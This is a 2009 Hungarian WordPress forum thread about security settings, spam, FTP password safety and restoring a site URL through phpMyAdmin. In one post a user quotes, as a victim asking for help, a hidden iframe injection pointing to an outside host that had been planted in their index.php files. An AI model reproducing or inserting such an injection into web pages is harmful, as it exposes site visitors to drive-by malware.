Ugrás a tartalomhoz


Biztonsági beállítások és rések


52 válasz erre a témára

#1 FCsaba

    Újonc

  • Regisztrált tag
  • Pipa
  • 12 Hozzászólás:

Elküldve: 2009-03-10 - 12:37 PM

Sziasztok!

Kezdő user vagyok. Szeretném a Wp-t telepíteni és használni, azonban előtte érdekelnie, milyen biztonsági beállításokat kell eszközölnöm ahhoz, hogy a lehető legkisebb/legkevesebb biztonsági rést hagyjam a visszaélések elkerülésére.

Értem itt a beállításokat, tesztelt beépülő elemeket stb...

Nem egy banki oldalt szeretnék, hanem egy olyan biztonságos rendszert, ahol mindent megtettem a megfelelő működés érdekében :)

Köszi :)

#2 Patai László

    WordPress Térítő

  • Adminisztrátor
  • 1530 Hozzászólás:
  • Település:Dunakeszi

Elküldve: 2009-03-10 - 12:44 PM

Nagyon jól fel van építve ilyen szempontból a wp szerencsére. X év alatt (lekopogom) nem törték fel egyetlen egy oldalamat sem, pedig több tucat wp site-om van, vagy volt közöm hozzá. Különösebben speckós beállításokra nincs szükség. Egy átlagos tárhelyen/szerveren is tökéletesen fut. Sok sikert a készülő wp oldaladhoz :)
Hoppare | WordPress
Az informatikában nincsenek titkok, csak két dolog kell megtanulni: 1. Olvasni 2. Google-t használni.
Tolerancia és tisztelet - ide egymástól tanulni járunk!

#3 DjZoNe

    Sötét WP Lovag

  • Adminisztrátor
  • 1511 Hozzászólás:
  • Település:Budapest / Magyarország

Elküldve: 2009-03-13 - 17:53 PM

Tavaly írtam a biztonságról egy cikket, - aminek a folytatása, még erősen vár rám -, de pár tippet meríthetsz belőle, ha picit is paranoid vagy.

amit annyival egészítenék még ki, hogy sose tegyél fel olyan bővítményt, ami a listázza, hogy milyen bővítmények vannak telepítve az oldalaldon, mivel ez az elsődleges kiindulási pont egy oldal törésekor.

#4 Farkas Győző

    WordPress-tisztelő

  • Adminisztrátor
  • 3946 Hozzászólás:
  • Település:Pécs/Hungary

Elküldve: 2009-03-13 - 23:59 PM

Kedves Fender!

Töltsön el büszkeséggel, hogy kérdésedre a két magyarországi WP-mogul rövid időn belül rávágott, és megnyugtató választ adott.

És irány a WordPress!

Olvastál olyant a fórumon, hogy segítsetek, feltörték az oldalamat?

Valószínűleg, ha valaki, aki felsőfokon keni-vágja a témát, ráfeküdne, hogy x-y szappanhabmentesito.hu oldalát fel akarja törni, akkor előbb-utóbb, inkább a felhasználó, vagy az admin hibájából fel tudná törni az oldalt.

Legyünk mindig résen, frissítsünk mindent a leggyakrabban, de ne legyünk idegbetegek, tudathasadásban szenvedők. Egészséges egyensúlyt a biztonságért! Sem többet, sem kevesebbet! :)

#5 FCsaba

    Újonc

  • Regisztrált tag
  • Pipa
  • 12 Hozzászólás:

Elküldve: 2009-03-14 - 00:50 AM

Hello DjZoNe és Győző!

Köszi a cikket, elolvastam és gyűjtöm az infókat. Nem szeretnék paranoidnak tűnni, csupán próbálok előre gondolkozni.

Amennyiben egyszer lesz Magyar űrügynökség, és megbíznak az oldal elkészítésével, itt és most ígérem WP lesz!

Hajrá :)

#6 hippia

    Újonc

  • Regisztrált tag
  • Pipa
  • 4 Hozzászólás:

Elküldve: 2009-04-02 - 11:22 AM

Nekem viszont gondot okoz, hogy álnéven hozzászólásokkal bombázzák az oldalam. :mad: Ki lehet ezt a funkciót kapcsolni? Egyébként a wp nagyon jó, a googleben a "béke világbéke" kifejezésre első helyen az oldalam!;)

www.hippia.net

#7 Efrud

    Veterán

  • Moderátor
  • 1692 Hozzászólás:
  • Település:Vác

Elküldve: 2009-04-02 - 11:27 AM

Hogy érted hogy álnéven bonbázzák? spam?
Több lehetőség van. Moderációhoz kötöd a hozzászólást vagy regisztrációhoz(ez szerintem nem olyan barátságos, de ezen ne vitázzunk) használsz akismet-et a spamek ellen. ha meg nem akarod hogy hozzászóljanak az adott posthoz, akkor kikapcsolod a hozzászólási lehetőségeket az adott postnál amikor megírod, vagy abszolute az egész redszerben.

#8 Guest_charlie_*

  • Guests

Elküldve: 2009-04-02 - 11:28 AM

Idézet

Nekem viszont gondot okoz, hogy álnéven hozzászólásokkal bombázzák az oldalam. :mad: Ki lehet ezt a funkciót kapcsolni? Egyébként a wp nagyon jó, a googleben a "béke világbéke" kifejezésre első helyen az oldalam!;)

www.hippia.net

szűrd ki azokat az IP tartományokat, amik anonymizer proxykhoz tartoznak.

(ha a névtelen hszeken nem spamot értesz)

#9 viktorio

    Törzstag

  • Regisztrált tag
  • PipaPipaPipaPipa
  • 306 Hozzászólás:

Elküldve: 2009-04-20 - 08:28 AM

Ftp védelmére milyen megoldás van?

#10 Guest_charlie_*

  • Guests

Elküldve: 2009-04-20 - 09:00 AM

mire gondolsz? bonyolult jelszó, amit nem mentesz el sehova se.

#11 viktorio

    Törzstag

  • Regisztrált tag
  • PipaPipaPipaPipa
  • 306 Hozzászólás:

Elküldve: 2009-04-21 - 23:06 PM

Idézet

Ftp védelmére milyen megoldás van?
erre;)

#12 E.D.

    Tag

  • Regisztrált tag
  • PipaPipaPipa
  • 208 Hozzászólás:

Elküldve: 2009-05-05 - 10:17 AM

Ma bekapott az egyik oldalam egy ilyet:

< iframe src="http://liteautoperfect.cn/ts/in.cgi?mozila14" width=2 height=4 style="visibility: hidden"></iframe >

Több index.php utolsó sorába beírta magát...
.htaccess-be nem került semmi idegen kód.

Mindenből a legfrissebb frissítés van fent a blogon, bár elég sok plugin-t használok... Tudtok valami tanácsot adni, hogy hogyan lehet megnehezíteni az ilyen kódok bejuttatását?

(ftp jelszót mindjárt változtatom)

#13 Guest_charlie_*

  • Guests

Elküldve: 2009-05-05 - 10:55 AM

géppel ne jegyeztesd az FTP jelszót, vagy ne használj Windowst.

#14 Guest_charlie_*

  • Guests

Elküldve: 2009-05-05 - 16:26 PM

hát, esetleg nem FTP használata, hanem pl. SFTP (ami nem egyenlő az FTPS-el). Ilyenekhez ma még nem igen vannak lopós dolgok (WinSCP, stb.)

#15 E.D.

    Tag

  • Regisztrált tag
  • PipaPipaPipa
  • 208 Hozzászólás:

Elküldve: 2009-05-05 - 12:38 PM

Az a gond, hogy nem csak nekem van hozzáférésem a honlaphoz. Én megvagyok megjegyzés, sőt még windows nélkül is, de a többiek nem... :( De majd kitalálok valamit...

#16 redragon

    Újonc

  • Regisztrált tag
  • Pipa
  • 12 Hozzászólás:

Elküldve: 2009-07-13 - 01:28 AM

sziasztok!
lenne 1 óriási nagy problémám!
nem egészen ide vonatkozik a téma, de olyan problémám lenne hogy véletlenül átírtam az általános beállításokban a Wordpress címe urlt. vagyis mostmár az oldal minden irányú megközelítését az átírt urlen keresztül próbálja elérni. hogyan tudnám visszaállítani? ugyanis így se belépni se semmit nem tudok... melyik fájlban tárolja ezt az infót? vagy esetleg van erre script amivel vissza tudom hozni, esetleg át tudom írni?
előre is köszi... remélem még van esélyem elkerülni az újrapakolást

#17 hgrg

    WP Addikt

  • VIP tag
  • PipaPipaPipaPipaPipaPipaPipa
  • 2943 Hozzászólás:

Elküldve: 2009-07-13 - 01:39 AM

BAKKER: nem egészen ide vonatkozik?!
Legalább vedd a fáradtságot és oda írj ahova kell.
van esélyed elkerülni az előre megfontolt szándékkal elkövetett TROLLkodást tőlem, ha nagyon gyorsan törlöd a postod és beteszed a megfelelő helyre!
Ez fórum. Itt ne mukodj ugy, h "jaj nemtudom hova való/bocs h nemoda ahova kéne de stb.. semmibe nem kerül kitalálni. mi a franc köze van a biztonsághoz annak h baromságot csináltál(én is elkövettem már párszor, de baromság)...
megoldás megintcsak le van írva már kismilliószor.
Belépsz phpMyAdminba .[prefix]_options táblában a home ill site mezők tartalmát leellenőrzöd/átítod.
Hgrg.Info | Segítség:Support.hgrg.info | WP fordítások

#18 redragon

    Újonc

  • Regisztrált tag
  • Pipa
  • 12 Hozzászólás:

Elküldve: 2009-07-13 - 02:16 AM

ok, bocs de sehol nem találok ilyen témát... tudsz akkor esetleg linkelni ahol részletesebben le van írva? mert ez alapján nem jutok sehova.

#19 Török Zoltán

    WP bűvölő

  • Regisztrált tag
  • PipaPipaPipaPipaPipa
  • 613 Hozzászólás:

Elküldve: 2009-07-13 - 03:46 AM

grrrrrrrrr
na hgrg megszolalasai miatt szoktam le errol a forumrol, pedig en telleg itt voltam a kezdetektol es igazan sokat segitettem az embereknek asszem

mi a fenenek kell leugatni ennyire az embert? jo en is puffogtem eleget, de ez mar tulzas amit itt muvel 1-2 emberke, nem is csodalkozom, hogy sorra jonnek elo a sertodesek...

igen, tudom, van forum szabalyzat, meg netikett, meg google, meg forum kereso, meg sok buta ember, de te minek kepzeled magad ilyenkor? egyszer lepne beled ugy valaki ahogy te teszed masokkal...

noh, csak ennyit akartam
Gyozonek koszi elore a bekitest es kerem tartsatok tiszteletben ezt az irasom
kis cégem, wordpress munkák | erettsegi.com
semmi sem romlik el magától....

#20 hgrg

    WP Addikt

  • VIP tag
  • PipaPipaPipaPipaPipaPipaPipa
  • 2943 Hozzászólás:

Elküldve: 2009-07-13 - 07:31 AM

@redragon:
PhpMyAdmin elérésed a szolgáltatódtól, függ, hogy merre találod.
Oda bejelentkezel egy arra szolgáló név/jelszó párossal amit valószínűleg a regisztrációnál kaptál.
baloldalt vannak a táblák. Ezek közül kikeresed az alapértelmezetten wp_ előtagú(=prefix, de ezt a telepítésnél átállíthattad) options táblát (tehát wp_options alapesetben) klikk.
Ez után jobb oldalt felül az első menüpont (Tartalom avagy browse)-al megnézed a táblában található adatokat.
Itt a legelső az "siteurl". Ha nem jó az értéke, akkor klikk az előtte lévő ceruzára, átír > végrehajt.
A másik mező kicsit "elrejtőzött" :)
Írd át a következő sorban a mezők felett:
[mutat(gomb)] [30] sor kezdve ezzel: [30] valami ilyenre:
[mutat(gomb)] [300] sor kezdve ezzel: [0]
Na így előbukkan a "home" mező is. (keress rá mert valahol a közepe táján van azt hiszem.
Sok sikert
[OFF]
@mindenki, főleg Zoli:
jogos. ugatok, harapok. a jövőben igyekszem mérsékelni magam. sajnálom, ha miattam szoktál le a fórumról. ezentúl ezen megjegyzéseim megtartom magam számára és igyekszem kevesebbet trollkodni. csak furának találom az egyre gyakrabban megjelenő hasonló -engem kifejezetten zavaró- eseteket:
tudom, hogy nem kéne de csinálom.

persze a hangnem amit megütök már nem provokatív, inkább elviselhetetlen, lassan minősíthetetlen. Ez sajnálatos.

De azt veszem észre, hogy ez sem hat semmiképp az emberekre. Illetve mint mondod csak azokra hat akikre nem kéne ezek szerint.

Zoli! Szólj be nekem nyugodtan, ha gondolod akár PMben, nem vagyok annyira szűk látókörű. Figyelmeztess, hogy legyen visszajelzés. Ha valaki egyszer bekerül abba a bizonyos "lila ködbe" akkor elég nehéz kikecmeregni :) .. de keresem már az utat..

sértődések. Bár nem látszik, elég érzékeny ember vagyok. Ettől függetlenül, ha ledurungolnak egy fórumon pld. akkor nem megsértődök, hanem megnézem azt, hogy a fröcsögés mögött van-e valami igazság. Majd levonom a konzekvenciát: ha üres locsogás hadd beszéljen. Ha nem, akkor talán van tennivalóm.

"egyszer lepne beled ugy valaki ahogy te teszed masokkal" Tedd meg nyugodtan, várom válaszod/aid, mindenkinek szüksége van kritikára. Ráadásul "zsenge ifjú" vagyok, aki a társadalmi minták közül nem a legjobbakon nevelődik.

Vegezetul: Sajnálom, ha valóban "leszoktál a fórumról". Ha megígérem, hogy nem "puffogok" a jövőben, visszajössz? :)

Egy hétig most biztosan csend lesz tőlem a fórumon..
Ha hazajöttem kérlek folytassuk ezt a Presszóban!
[/OFF]
Hgrg.Info | Segítség:Support.hgrg.info | WP fordítások





1 felhasználó olvassa ezt a témát.

0 felhasználó, 1 vendég, 0 anonim felhasználó